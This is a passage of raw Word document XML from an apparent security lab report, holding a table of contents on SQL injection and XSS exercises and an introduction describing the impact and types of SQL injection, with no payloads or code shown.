        <w:tblW w:w="8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3351"/>
        <w:gridCol w:w="2587"/>
      </w:tblGrid>
      <w:tr w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06"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Sr. No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06"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Page No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:trHeight w:val="624"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="00F168C7" w:rsidRDefault="00996A06" w:rsidP="00E028FD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F168C7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="00DA0AFB" w:rsidRDefault="00F168C7" w:rsidP="00F168C7">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> injection to display all tables in database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06"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996A06" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="00DA0AFB" w:rsidRDefault="00F168C7" w:rsidP="00F168C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> injection to display table name and its columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06"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996A06" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="00DA0AFB" w:rsidRDefault="00F168C7" w:rsidP="00F168C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> injection to display all entries of user email and password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06"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996A06" w:rsidRPr="009F6965" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2968" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06" w:rsidP="00E028FD">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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4</w:t>
            </w:r>
            <w:r w:rsidR="00F168C7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3351" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="00DA0AFB" w:rsidRDefault="00F168C7" w:rsidP="00F168C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Reflected XSS example 1 and 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2587" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00F168C7" w:rsidP="00E028FD">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F168C7" w:rsidTr="00F168C7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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68C7" w:rsidRPr="00F168C7" w:rsidRDefault="00F168C7" w:rsidP="00F168C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68C7" w:rsidRPr="00DA0AFB" w:rsidRDefault="00F168C7" w:rsidP="00F168C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2B3033"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2B3033"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA0AFB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2B3033"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> XSS example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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68C7" w:rsidRPr="00F168C7" w:rsidRDefault="00F168C7" w:rsidP="00F168C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bl>
    <w:p w:rsidR="00996A06" w:rsidRPr="009F6965" w:rsidRDefault="00996A06">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CB6376" w:rsidRDefault="00CB637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FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009A6244" w:rsidRDefault="00FC2AFC" w:rsidP="00F754EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="009A6244">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:t>r.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6F01" w:rsidRDefault="001D6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D6F01" w:rsidRDefault="001D6F01" w:rsidP="00620884">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rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The impact of a successful SQL injection attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6244">
        <w:t>There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00A550D9" w:rsidP="009A6244">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hyperlink r:id="rId8" w:anchor="retrieving-hidden-data" w:history="1">
        <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Retrieving hidden data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where you can modify an SQL query to return additional results.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00A550D9" w:rsidP="009A6244">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hyperlink r:id="rId9" w:anchor="subverting-application-logic" w:history="1">
        <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Subverting application logic</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where you can change a query to interfere with the application's logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00A550D9" w:rsidP="009A6244">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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>UNION attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where you can retrieve data from different database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00A550D9" w:rsidP="009A6244">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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Examining the database</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where you can extract information about the version and structure of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00A550D9" w:rsidP="009A6244">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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Blind SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00620884" w:rsidRPr="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where the results of a query you control are not returned in the application's responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009A6244" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="00DA0AFB" w:rsidRDefault="00620884" w:rsidP="009A6244">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA0AFB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
